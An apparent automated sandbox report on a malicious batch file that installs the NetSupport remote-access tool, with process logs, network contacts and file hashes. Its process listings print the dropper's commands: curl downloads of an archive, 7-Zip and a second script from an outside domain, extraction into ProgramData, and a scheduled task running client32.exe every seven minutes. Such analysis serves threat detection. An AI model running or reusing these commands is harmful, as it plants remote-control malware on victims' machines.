Analysis Overview
SHA256
b2069732f98d91fc2b2814c687115ab927191a0db26dd21a9ac0f7f79a65672b
Threat Level: Known bad
The file 11.bat was found to be: Known bad.
Malicious Activity Summary
NetSupport
Downloads MZ/PE file
Executes dropped EXE
Loads dropped DLL
Creates scheduled task(s)
Delays execution with timeout.exe
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-05-27 08:20
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-05-27 08:20
Reported
2023-05-27 08:22
Platform
win7-20230220-en
Max time kernel
28s
Max time network
30s
Command Line
Signatures
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\11.bat"
C:\Windows\system32\cmd.exe
cmd.exe /c C:\ProgramData\sett.bat"
C:\Windows\system32\cmd.exe
cmd.exe /c C:\ProgramData\7z.bat"
C:\Windows\system32\cmd.exe
cmd.exe /c C:\ProgramData\2.bat"
C:\Windows\system32\cmd.exe
cmd.exe /c C:\ProgramData\2.bat"
Network
Files
C:\ProgramData\sett.bat
| MD5 | 682951b449a6ba6a19e6c5130e3c5ed7 |
| SHA1 | e1a6510e4ba54099e13778b0cccdb08ecf0e7bb6 |
| SHA256 | e169d1b5f8af9388db4bdcf019cfadbd5daa078427cc5662d43c74dd6b7864da |
| SHA512 | 4790b4b636042bea53f22a2cec96f9b3b04920b2941dbc3edad62c611821200042d4cf0979c40c7a96cec1c16d1f76c53f7e6509b04ce1c01e0bf268aa45a127 |
C:\ProgramData\7z.bat
| MD5 | 7fc6d26bb3e5ff0178bbca973729469f |
| SHA1 | 243bf47775c7bbf1498a7b026dffe0b4ed4a3cd3 |
| SHA256 | 59b8fd877b81ab11211b03d4707db2f1f36b30ac2318a34d61300c57588fb495 |
| SHA512 | 614331c41bd6ede3a1c91cfcea3a01569f6af4def0f61acb259f0998bfb5d829a36771c393b5169c52e3f1da9d91592a00c1062607b4f23d4a2fcf8f3f978f37 |
C:\ProgramData\2.bat
| MD5 | 9d012776fb8716fbccf70bb57ae7c7a2 |
| SHA1 | bb5dd6998bd3e58259a8da00dec82b910f0cba95 |
| SHA256 | cf3fd955993cc009626ce769ec543d1f951911fb891fccb2c33700c37d3488f1 |
| SHA512 | 79e7c4ba9baac4c1e0cd1cf308f7ce02f98e56d12abf3d5745fa6a5d1bcf55170a83134894b1e427893c1b8be70b0473e1fe45d062af806e9f60cf599533fe94 |
Analysis: behavioral2
Detonation Overview
Submitted
2023-05-27 08:20
Reported
2023-05-27 08:22
Platform
win10v2004-20230220-en
Max time kernel
135s
Max time network
145s
Command Line
Signatures
NetSupport
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\7zz.exe | N/A |
| N/A | N/A | C:\ProgramData\client32.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\client32.exe | N/A |
| N/A | N/A | C:\ProgramData\client32.exe | N/A |
| N/A | N/A | C:\ProgramData\client32.exe | N/A |
| N/A | N/A | C:\ProgramData\client32.exe | N/A |
| N/A | N/A | C:\ProgramData\client32.exe | N/A |
| N/A | N/A | C:\ProgramData\client32.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\ProgramData\client32.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\client32.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\11.bat"
C:\Windows\system32\cmd.exe
cmd.exe /c C:\ProgramData\sett.bat"
C:\Windows\system32\curl.exe
curl -k "http://manchhd32ss.fun/412566367c67448b599d1b7666f8ccfc/tempy.7z" -o "C:\ProgramData\tempy.7z"
C:\Windows\system32\cmd.exe
cmd.exe /c C:\ProgramData\7z.bat"
C:\Windows\system32\curl.exe
curl -k "http://manchhd32ss.fun/412566367c67448b599d1b7666f8ccfc/7z.exe" -o "C:\ProgramData\7zz.exe"
C:\Windows\system32\cmd.exe
cmd.exe /c C:\ProgramData\2.bat"
C:\Windows\system32\curl.exe
curl -k "http://manchhd32ss.fun/412566367c67448b599d1b7666f8ccfc/2.bat" -o "C:\ProgramData\2.bat"
C:\Windows\system32\cmd.exe
cmd.exe /c C:\ProgramData\2.bat"
C:\Windows\system32\xcopy.exe
xcopy /h /y 7zz.exe C:\ProgramData\
C:\Windows\system32\cmd.exe
cmd /c C:\ProgramData\7zz.exe x -y C:\ProgramData\tempy.7z -oC:\ProgramData\
C:\Windows\system32\xcopy.exe
xcopy /h /y tempy.7z C:\ProgramData\
C:\Windows\system32\timeout.exe
TIMEOUT /T 2
C:\ProgramData\7zz.exe
C:\ProgramData\7zz.exe x -y C:\ProgramData\tempy.7z -oC:\ProgramData\
C:\Windows\system32\schtasks.exe
SCHTASKS /create /F /tn "VCC_runner2" /tr "cmd.exe /c C:\ProgramData\client32.exe" /sc minute /mo 7 /sd 01/01/2022 /st 00:00
C:\Windows\system32\cmd.exe
cmd /c C:\ProgramData\client32.exe
C:\ProgramData\client32.exe
C:\ProgramData\client32.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | manchhd32ss.fun | udp |
| RU | 188.127.224.82:80 | manchhd32ss.fun | tcp |
| US | 8.8.8.8:53 | 82.224.127.188.in-addr.arpa | udp |
| RU | 188.127.224.82:80 | manchhd32ss.fun | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| RU | 188.127.224.82:80 | manchhd32ss.fun | tcp |
| US | 94.158.244.118:1203 | tcp | |
| US | 8.8.8.8:53 | geo.netsupportsoftware.com | udp |
| GB | 62.172.138.67:80 | geo.netsupportsoftware.com | tcp |
| US | 8.8.8.8:53 | 118.244.158.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.138.172.62.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 20.189.173.6:443 | tcp | |
| US | 52.152.110.14:443 | tcp | |
| US | 209.197.3.8:80 | tcp | |
| NL | 173.223.113.164:443 | tcp | |
| NL | 173.223.113.131:80 | tcp | |
| US | 204.79.197.203:80 | tcp | |
| US | 52.152.110.14:443 | tcp | |
| NL | 84.53.175.11:80 | tcp | |
| US | 52.152.110.14:443 | tcp | |
| US | 52.152.110.14:443 | tcp | |
| US | 52.152.110.14:443 | tcp | |
| US | 52.152.110.14:443 | tcp |
Files
C:\ProgramData\sett.bat
| MD5 | 682951b449a6ba6a19e6c5130e3c5ed7 |
| SHA1 | e1a6510e4ba54099e13778b0cccdb08ecf0e7bb6 |
| SHA256 | e169d1b5f8af9388db4bdcf019cfadbd5daa078427cc5662d43c74dd6b7864da |
| SHA512 | 4790b4b636042bea53f22a2cec96f9b3b04920b2941dbc3edad62c611821200042d4cf0979c40c7a96cec1c16d1f76c53f7e6509b04ce1c01e0bf268aa45a127 |
C:\ProgramData\7z.bat
| MD5 | 7fc6d26bb3e5ff0178bbca973729469f |
| SHA1 | 243bf47775c7bbf1498a7b026dffe0b4ed4a3cd3 |
| SHA256 | 59b8fd877b81ab11211b03d4707db2f1f36b30ac2318a34d61300c57588fb495 |
| SHA512 | 614331c41bd6ede3a1c91cfcea3a01569f6af4def0f61acb259f0998bfb5d829a36771c393b5169c52e3f1da9d91592a00c1062607b4f23d4a2fcf8f3f978f37 |
C:\ProgramData\2.bat
| MD5 | 9d012776fb8716fbccf70bb57ae7c7a2 |
| SHA1 | bb5dd6998bd3e58259a8da00dec82b910f0cba95 |
| SHA256 | cf3fd955993cc009626ce769ec543d1f951911fb891fccb2c33700c37d3488f1 |
| SHA512 | 79e7c4ba9baac4c1e0cd1cf308f7ce02f98e56d12abf3d5745fa6a5d1bcf55170a83134894b1e427893c1b8be70b0473e1fe45d062af806e9f60cf599533fe94 |
C:\ProgramData\2.bat
| MD5 | 20339443a8789c448d23bb7d7d227373 |
| SHA1 | 0998e456d72d1e0a323761b88f0b6f27eeed3119 |
| SHA256 | db9bfac3e8c8667293f5685032eb088e4c2078c308ef59464241e5b89c28143f |
| SHA512 | ffe37c8b2632597c18ab837d833090498ee982c3cd5409f3a6d88fc787e4795bdec3acd2a450fd7060785d8219acccf9d6bc797b092d1de79acc0fc2d1444e7f |
C:\ProgramData\7zz.exe
| MD5 | 42badc1d2f03a8b1e4875740d3d49336 |
| SHA1 | cee178da1fb05f99af7a3547093122893bd1eb46 |
| SHA256 | c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf |
| SHA512 | 6bc519a7368ee6bd8c8f69f2d634dd18799b4ca31fbc284d2580ba625f3a88b6a52d2bc17bea0e75e63ca11c10356c47ee00c2c500294abcb5141424fc5dc71c |
C:\ProgramData\7zz.exe
| MD5 | 42badc1d2f03a8b1e4875740d3d49336 |
| SHA1 | cee178da1fb05f99af7a3547093122893bd1eb46 |
| SHA256 | c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf |
| SHA512 | 6bc519a7368ee6bd8c8f69f2d634dd18799b4ca31fbc284d2580ba625f3a88b6a52d2bc17bea0e75e63ca11c10356c47ee00c2c500294abcb5141424fc5dc71c |
C:\ProgramData\tempy.7z
| MD5 | 6979bbce289387135ab861f59d2e0483 |
| SHA1 | 475f466a7f6c37c2d9d64cef1489b3220f58d0ce |
| SHA256 | 8973b65aad1ee3f3b2bfa7038f8eaaae97e8b3dfffff6a6e6ef3e5eec04da498 |
| SHA512 | a719943df9b73b59c1ed0a9921a0eaa626d3dde9fdb912577d53b2c6852e77adcfff8af2af71ee4e0fd3cda8fab78d89771d43159059febe07e626c2f692c58f |
C:\ProgramData\client32.exe
| MD5 | ba69ff5da9131aa06a6509b05ae1a78f |
| SHA1 | fc1ea269f940b49822885449b3c406a237f4832a |
| SHA256 | d4d475aee58cab94a918c92c65a7d462f4dd5b9ec15b194162483be711f5bfbb |
| SHA512 | e4dd4388f40e027b5d909bb35d77197f0814148605211ee88de77cb4420438c8a4e58bba5f4ed0828d616d0ebad4b905713595f38f7a236244c56cbc0f647a19 |
C:\ProgramData\client32.exe
| MD5 | ba69ff5da9131aa06a6509b05ae1a78f |
| SHA1 | fc1ea269f940b49822885449b3c406a237f4832a |
| SHA256 | d4d475aee58cab94a918c92c65a7d462f4dd5b9ec15b194162483be711f5bfbb |
| SHA512 | e4dd4388f40e027b5d909bb35d77197f0814148605211ee88de77cb4420438c8a4e58bba5f4ed0828d616d0ebad4b905713595f38f7a236244c56cbc0f647a19 |
C:\ProgramData\PCICL32.dll
| MD5 | d3d39180e85700f72aaae25e40c125ff |
| SHA1 | f3404ef6322f5c6e7862b507d05b8f4b7f1c7d15 |
| SHA256 | 38684adb2183bf320eb308a96cdbde8d1d56740166c3e2596161f42a40fa32d5 |
| SHA512 | 471ac150e93a182d135e5483d6b1492f08a49f5ccab420732b87210f2188be1577ceaaee4ce162a7acceff5c17cdd08dc51b1904228275f6bbde18022ec79d2f |
C:\ProgramData\PCICL32.DLL
| MD5 | d3d39180e85700f72aaae25e40c125ff |
| SHA1 | f3404ef6322f5c6e7862b507d05b8f4b7f1c7d15 |
| SHA256 | 38684adb2183bf320eb308a96cdbde8d1d56740166c3e2596161f42a40fa32d5 |
| SHA512 | 471ac150e93a182d135e5483d6b1492f08a49f5ccab420732b87210f2188be1577ceaaee4ce162a7acceff5c17cdd08dc51b1904228275f6bbde18022ec79d2f |
C:\ProgramData\pcicapi.dll
| MD5 | 34dfb87e4200d852d1fb45dc48f93cfc |
| SHA1 | 35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641 |
| SHA256 | 2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703 |
| SHA512 | f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2 |
C:\ProgramData\pcichek.dll
| MD5 | 104b30fef04433a2d2fd1d5f99f179fe |
| SHA1 | ecb08e224a2f2772d1e53675bedc4b2c50485a41 |
| SHA256 | 956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd |
| SHA512 | 5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f |
C:\ProgramData\pcicapi.dll
| MD5 | 34dfb87e4200d852d1fb45dc48f93cfc |
| SHA1 | 35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641 |
| SHA256 | 2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703 |
| SHA512 | f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2 |
C:\ProgramData\PCICHEK.DLL
| MD5 | 104b30fef04433a2d2fd1d5f99f179fe |
| SHA1 | ecb08e224a2f2772d1e53675bedc4b2c50485a41 |
| SHA256 | 956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd |
| SHA512 | 5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f |
C:\ProgramData\MSVCR100.dll
| MD5 | 0e37fbfa79d349d672456923ec5fbbe3 |
| SHA1 | 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335 |
| SHA256 | 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 |
| SHA512 | 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630 |
C:\ProgramData\msvcr100.dll
| MD5 | 0e37fbfa79d349d672456923ec5fbbe3 |
| SHA1 | 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335 |
| SHA256 | 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 |
| SHA512 | 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630 |
C:\ProgramData\NSM.LIC
| MD5 | 1b41e64c60ca9dfadeb063cd822ab089 |
| SHA1 | abfcd51bb120a7eae5bbd9a99624e4abe0c9139d |
| SHA256 | f4e2f28169e0c88b2551b6f1d63f8ba513feb15beacc43a82f626b93d673f56d |
| SHA512 | c97e0eabea62302a4cfef974ac309f3498505dd055ba74133ee2462e215b3ebc5c647e11bcbac1246b9f750b5d09240ca08a6b617a7007f2fa955f6b6dd7fee4 |
C:\ProgramData\client32.ini
| MD5 | 9fd51ba7e1b8b8c4586354338df32acc |
| SHA1 | 30f194d6f87be214031410adeaf5f9df4f7945e2 |
| SHA256 | 7d1302fc5aeb3aa1233d44cea8263ee577041c92d7aab5cad69dce94574ef49a |
| SHA512 | 04d9db9653d98e578631a743dd7693ee3094d1c25e83e0bf66ab42e3b00e0abeeebf03e982d4392fb5ed49b9698062d7ba2350f209c1af721c064fda17cb9760 |
C:\ProgramData\TCCTL32.DLL
| MD5 | eab603d12705752e3d268d86dff74ed4 |
| SHA1 | 01873977c871d3346d795cf7e3888685de9f0b16 |
| SHA256 | 6795d760ce7a955df6c2f5a062e296128efdb8c908908eda4d666926980447ea |
| SHA512 | 77de0d9c93ccba967db70b280a85a770b3d8bea3b707b1abb037b2826b48898fec87924e1a6cce218c43478e5209e9eb9781051b4c3b450bea3cd27dbd32c7f3 |
C:\ProgramData\TCCTL32.DLL
| MD5 | eab603d12705752e3d268d86dff74ed4 |
| SHA1 | 01873977c871d3346d795cf7e3888685de9f0b16 |
| SHA256 | 6795d760ce7a955df6c2f5a062e296128efdb8c908908eda4d666926980447ea |
| SHA512 | 77de0d9c93ccba967db70b280a85a770b3d8bea3b707b1abb037b2826b48898fec87924e1a6cce218c43478e5209e9eb9781051b4c3b450bea3cd27dbd32c7f3 |
C:\ProgramData\HTCTL32.DLL
| MD5 | c94005d2dcd2a54e40510344e0bb9435 |
| SHA1 | 55b4a1620c5d0113811242c20bd9870a1e31d542 |
| SHA256 | 3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899 |
| SHA512 | 2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a |
C:\ProgramData\HTCTL32.DLL
| MD5 | c94005d2dcd2a54e40510344e0bb9435 |
| SHA1 | 55b4a1620c5d0113811242c20bd9870a1e31d542 |
| SHA256 | 3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899 |
| SHA512 | 2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a |